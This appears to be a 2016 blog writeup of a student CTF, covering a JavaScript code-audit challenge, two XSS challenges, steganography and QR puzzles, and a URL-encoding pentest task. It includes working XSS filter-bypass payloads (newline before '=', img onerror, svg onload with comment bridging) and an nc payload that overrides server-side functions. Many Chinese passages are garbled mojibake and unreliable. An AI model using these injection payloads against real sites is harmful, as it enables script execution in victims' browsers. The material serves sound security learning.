LoRexxar's Blog

hctf_game_week3_writeup

2016/02/29

Over the holiday I finally had some free time, so together with the club members I organized a fairly simple CTF for the younger students at school. I am posting the writeup for each round here for reference and study.

WEB

Code audit: Javascript Magic Hat POINT: 200

鏈棰樿В璇︽儏
棰樼洰ID锛 66
棰樼洰鎻忚堪锛 浠g爜瀹¤:Javascript榄旀硶甯 nc 114.215.155.190 10009
Hint: 婧愮爜锛堝鏋滀綘鎯抽粦鐩掔殑璇濆彲浠ュ拷鐣ワ級锛https://gist.github.com/iAklis/2770f07540b6ddfc1d66

Honestly I found this challenge very hard: my first attempts all failed, and only after asking ak, the old hand, did I learn how it is done.
First of all, a big block of JS like this is tedious for anyone to analyze.

function (urandom) {
    function step1(){ //2028 done
        var a = new Date();
        var b = Number(a.getFullYear());
        t = 0;
        for (var i = 0; i < b.length; i++ ){ // b is a Number, so b.length is undefined and this loop never runs
            t += parseInt();
        }
        var c = String(a.getFullYear());
        for (var i = 0; i < c.length; i++ ){ // "digit sum" of the year, except b is never floored, so fractions leak into t
            t += b % 10;
            b = b / 10;
        }
        var b = Number(a.getFullYear());
        if (!(b%400===0 || b%100!=0 && b%4===0)) // must be a leap year
            return false;
        if (!(t > 11 & t < 27)) // bitwise &, which still works here because both operands are booleans
            return false;
        return true;
    }
    function step2() { //a.concat
        var a = Array.apply(null, new Array(Math.floor(Math.random() * 20 + 12) + 10)).map(function () {return Math.random() * 0x10000;});
        var b = urandom(a.length);
        if (!Array.isArray(b)) {
            return false;
        }
        if (b.length < a.length) { // pad a short answer with fresh random values, so it cannot match
            for (var i = 0, n = a.length - b.length; i < n; i++) {
                delete b[b.length];
                b[b.length] = [Math.random() * 0x10000];
            }
        } else if (b.length > a.length) {
            for (var i = 0, n = b.length - a.length; i < n; i++)
                Array.prototype.pop.apply(b);
        }
        for (var i = 0, n = b.length; i < n; i++) {
            if (a[i] != b[i]) {
                return false;
            }
        }
        return true;
    }
    function step3() { // same as step2, but a is built from urandom() instead of Math.random()
        var a = Array.apply(null, new Array((urandom() % 20 + 12) + 10)).map(function () {return urandom() % 0x10000;});
        var b = urandom(a.length);
        if (!Array.isArray(b)) {
            return false;
        }
        if (b.length < a.length) {
            for (var i = 0, n = a.length - b.length; i < n; i++) {
                delete b[b.length];
                b[b.length] = [Math.random() * 0x10000];
            }
        } else if (b.length > a.length) {
            for (var i = 0, n = b.length - a.length; i < n; i++)
                Array.prototype.pop.apply(b);
        }
        for (var i = 0, n = b.length; i < n; i++) {
            if (a[i] != b[i]) {
                return false;
            }
        }
        return true;
    }
    if (!step1())
        return "Thinkphp!";
    if (!step2())
        return "Yiiii~";
    if (!step3())
        return "Laravel!";
    return flag;
}

鑰屽浜庤繖鏍风殑js瀹¤棰樼洰鏉ヨ锛宖irefox firebug鐨勬帶鍒跺彴缁濆鏄涓绁炲櫒锛屼緥濡傛垜浠彲浠ュ厛鎶妔tep1锛堬級澶嶅埗涓嬫潵锛岀劧鍚庢妸鍑芥暟鍘绘帀锛屾妸return鏀逛负鏈夋剰涔夌殑alert锛岀劧鍚庡叾涓姝ョ殑鍙橀噺閫氳繃console.log鎴栬卍ocument.write鐨勬柟娉曡緭鍑哄鏉ユ祴璇曘
灏辨瘮濡傚湪鎴戞渶寮濮嬬殑娴嬭瘯涓紝2028骞村氨鍙互杩囩涓姝ワ紝浣嗘槸瀹為檯棰樼洰鍦ㄦ湇鍔″櫒鐜涓嬶紝鍙垜浠讳笉鑳界瓑鍒2028骞存墠鍋氶锛屾墍浠ヨ繖閲屽叾瀹炴槸閫氳繃閲嶅啓鍑芥暟鐨勬柟寮忔潵杩囧垽鏂殑銆

payload:
echo 'Array.apply=function(){return [];};function urandom(){return [];}function Date(){this.getFullYear=function(){return 1924;}}'| nc aklis.yun 10009
Study it carefully.

WEB from scratch: xss challenge2 POINT: 150

鏈棰樿В璇︽儏
棰樼洰ID锛 58
棰樼洰鎻忚堪锛 http://115.28.78.16/xss/xss2/index.php
1銆佹垚鍔熸墽琛宲rompt(1).
2銆乸ayload蹇呴』瀵逛笅杩版祻瑙堝櫒鏈夋晥锛 Chrome(鏈鏂扮増) - Firefox(鏈鏂扮増)
3銆佸皢鏈夋晥payload鍙戦佺粰qq578168406(LoRexxar)鎴栬呭ぇ椋炲鑾峰彇flag

The original of this challenge is again a level from the prompt(1) to win contest, where the intended payload is:

"type=image src onerror
="prompt(1)

But last time people complained that I had used an original challenge verbatim and that anyone who searched could find the payload, so I filtered the original answer. I then found there was no way to pop the dialog without user interaction. Assuming the intended idea was otherwise unchanged, my payload here was:

"type="button
" onclick
="prompt(1)

It turns out that once you switch to onclick, the type no longer matters at all, so one test point was lost; but since the difficulty was already lowered, so be it. Sadly only two people submitted a payload to me, and it was this:

" onclick
="prompt(1)

Reading the source carefully reveals two points:
1. First, the filter: anything of the form onxxxx= is replaced with _, which is bypassed by putting a newline before the =.
2. Second, a later type attribute cannot override an earlier one, so the injected one can set type=image. (Because of my slip this no longer matters, of course.)

WEB from scratch: xss challenge3 POINT: 200

鏈棰樿В璇︽儏
棰樼洰ID锛 59
棰樼洰鎻忚堪锛 http://115.28.78.16/xss/xss3/index.php
1銆佹垚鍔熸墽琛宲rompt(1).
2銆乸ayload涓嶉渶瑕佺敤鎴蜂氦浜
3銆乸ayload蹇呴』瀵逛笅杩版祻瑙堝櫒鏈夋晥锛 Chrome(鏈鏂扮増) - Firefox(鏈鏂扮増)
4銆佸皢鏈夋晥payload鍙戦佺粰qq578168406(LoRexxar)鎴栬呭ぇ椋炲鑾峰彇flag

The challenge comes from level 7 of the prompt(1) to win contest. Reading the source carefully: the input is split on #, each piece is placed in its own title attribute, and a piece longer than 12 characters is cut to its first 12. The trick is to use JS comments so that the code spread over the separate pieces joins up.

A bit of testing shows that the markup rendered between two pieces contains whitespace, so a keyword such as script, on+xxx or prompt cannot be split across pieces (a space in the middle breaks it). That means script plus its payload overflows the 12-character limit, so the original solution is:

"><svg/a=#"onload='/*#*/prompt(1)'

which renders as:

<p class="comment" title=""><svg/a="></p>
<p class="comment" title=""onload='/*"></p>
<p class="comment" title="*/prompt(1)'"></p>

You cannot use /**/ to bridge the gap between the first and second lines (that gap falls inside the svg tag, where the quoted attribute value swallows it instead); svg is used because inside SVG any element's onload event runs JavaScript with no user interaction.
But I filtered svg. An img tag's onerror attribute serves the same purpose, so my payload is:

"><img/src=#"onerror='/*#*/prompt(1)'

It pops successfully.

misc

MISC Driving Skills Subject Five POINT: 250 DONE

鏈棰樿В璇︽儏
棰樼洰ID锛 40
棰樼洰鎻忚堪锛 娉ㄦ剰璺喌锛岀湅浠旂粏鐐瑰晩锛佸皬浼欏瓙浠紒鍒硅溅鍟婂埞杞︼紒锛侊紒 璁╂垜涓嬭溅锛佽鎴戜笅杞︼紒锛
Hint: 鏆傛棤HINT

The entrance to subject five is inside the download from subject four; opening it gives an image. This one really had me stuck for a long, long time; only after reading spine's writeup did I realize it was LSB steganography. Open the image in Stegsolve, choose Data Extract, tick bit 0 of R, G and B, and a base64-encoded string appears. Decoding it gives unprintable bytes; I asked an old hand and learned it was zlib-compressed. So, time to write some code.

import zlib
import binascii
import base64

# The base64 string read out of Stegsolve's Data Extract (bit 0 of R, G and B).
aa = "eF6NkEFWw0AMQ8+SGyTHYAVXgL7SrrrgwYY+7k78JTmGBY9J05mxJVnK9fT+ej+/XdaPz+v59vJ8uyzL8vT4sK/98LX9Y61a27buv3r1z41FZ197IwhA1UpHhZThBA4Uah9MdKGavyCS1eA0G2IvodnY4bJ9g/j54DrqlUm+pDEbI0B5ryttXPDyTbLQGRmFELE51ihL1mSPVNBoBsTue06DH1MQuHi3y2KWhOQ0YcLohqY5niYGogCwaYtWlbL6hTFOI5vjLBgjipaFVYPdjZHEVQI4Q9uIKWdoRLAWhKunIDHhU11lHX2qh9KRmlYA8kLBdZlqa8WzDpIzeH08vgl1/VGrR1W4gtTB47TBlkZPzzgrD2osas70YuPWF64FE0cpbHIk6oHxUgnlXlGkLqMEJZFTWa+2pAH5x/oGmlvynQ=="
aa = base64.b64decode(aa)
# The decoded bytes are a zlib stream (0x78 header byte), so inflate them.
# (The original script ran hexlify() followed by .decode('hex') here, which cancels out.)
result = zlib.decompress(aa)
print(result)
# The inflated text is itself hex: decode it once more to get the flag.
print(binascii.unhexlify(result.strip()))

The result is a 31-character string; one look is enough to see it needs one more hex decode, and then: get flag!

MISC Driving Skills Subject Six POINT: 100 DONE

鏈棰樿В璇︽儏
棰樼洰ID锛 41
棰樼洰鎻忚堪锛 杩囦簡杩欎竴鍏筹紝灏卞張鏈変竴浣嶆柊鍙告満璇炵敓浜嗭紒

By this point the subject series gets easy: we are given a big string of 0s and 1s, its length is 1225, which is not divisible by 8 but is a perfect square (35 x 35), so it is clear what this is.
We need to turn the 0/1 string into a QR code, so let's write some code.

from PIL import Image

# 35 x 35 modules; '0' is a dark module, '1' a light one.
pic = Image.new("RGB", (35, 35))
aa = "1111111111111111111111111111111111110000000110110011010011001100000001101111101011001101101000001011111011010001010000000110010110010100010110100010110001011101000100101000101101000101011111110111010001010001011011111010010100011101011110111110110000000101010101010101010100000001111111111001101011010100111111111111001011001101111000011100010001001111111111111001100110100010100100101111010001000110000110101101111011011001111110111101011111010110110101111101010111110110110111101000111001101000011010000101000101110010101011001111000011010000110010001101001111011111010010110100000001110011011110111100100010100000010001000111011001000111001111010111010011111111111000000000111100010111111100100001101001011111010100101100011011110011100111001000010010110101001010111111010101010100100001111110000111001100100000101000010100101101110011011101000101000011001010001001000100110110110111101100010100110000011111111111111011010000010000101110101011000000010110100010111001010100101110111110111001000101100010111011011101000101100100100100001100000111111010001010111000010011001000100110110100010110000100010100110011000101101111101001101100011101001000111111000000010111011010100001010001101111111111111111111111111111111111111"
i = 0
for y in range(0, 35):
    for x in range(0, 35):
        if aa[i] == '0':
            pic.putpixel((x, y), (0, 0, 0))
        else:
            pic.putpixel((x, y), (255, 255, 255))
        i = i + 1
pic.show()
pic.save("flag.png")

鎵竴鎵笂杞︺

pentest

lightless&aklis's pentest classroom-4 POINT: 100 DONE

鏈棰樿В璇︽儏
棰樼洰ID锛 65
棰樼洰鎻忚堪锛 http://120.27.53.238/pentest/04/encodeanddecode.php
Hint: 鏆傛棤HINT

鎴戣寰楄姹傛瘮杈冩竻鏅帮紝鏈変竴涓悊瑙d笂鐨勫潙鏈夌偣鍎块夯鐑︼紝灏辨槸姣忔鍙戦佺殑璇锋眰浼氳嚜鍔ㄦ湁涓娆rl鐨刣ecode锛屾墍浠ュ鏋滆鍙戦佹寚瀹氱殑涓滆タ锛屼綘闇瑕佸厛鎸夌収鎵闇缂栫爜涓娆★紝鍐嶅叏閮╱rl鐨別ncode锛岃繖鏍锋湇鍔″櫒浼氬彈鍒版纭殑璇锋眰銆
鏀跺埌杩欐牱鐨勪笢瑗垮氨get flag浜嗭紝澶氳瘯璇曠湅锛

string(52) "&lt;script&gt;x=alert;x('lightless');&lt;/script&gt;"
string(62) "%3Cscript%3Ex%3Dalert%3Bx%28%27lightless%27%29%3B%3C/script%3E"
